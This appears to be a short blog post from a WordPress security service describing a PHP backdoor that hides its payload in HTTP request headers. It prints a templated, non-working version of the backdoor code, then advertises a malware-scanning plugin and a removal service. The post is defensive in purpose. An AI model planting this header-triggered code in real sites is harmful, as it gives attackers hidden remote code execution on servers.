We will explain about the type of backdoor that puts the main body of malware code in $_HEADERS, which has been increasingly detected in recent years.


Backdoor that sends malware body code by HEADER instead of POST or GET

This backdoor is a new type of backdoor in the sense that it remotely infects the server with the malware itself, which is embedded in the information in the header part of the HTML request called HEADER, instead of remotely infecting the server with malware through conventional POST or GET requests. This is a new type of backdoor, but it is currently very popular.

By taking advantage of a vulnerability in WordPress, or by being deprived of administrator privileges, a number of backdoors with the following code are generated in WordPress folders and plugin/theme folders with generic word files.

$_HEADERS = getallheaders();
if (isset($_HEADERS['random word'])) {
    $random words = $_HEADERS['random words']('', $_HEADERS['random words']($_HEADERS['random words']));
    $_random_word();
}

The code is designed to remotely execute a CreateFunction (similar to the function eval, which creates a function in PHP) with a random name header data in the header array, but without using POST or GET requests and with the random name header data. This makes the code very difficult to detect as a backdoor.

Detection and Removal

Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].

You can detect and get rid of this type of backdoor by using the latest malware detection patterns at

We hope you will give it a try.

Reference
5 Free WordPress Security Measures

WordPress Doctor can also perform malware and backdoor scanning and removal on your behalf. If you find it difficult to do it by yourself, please feel free to send us your inquiries.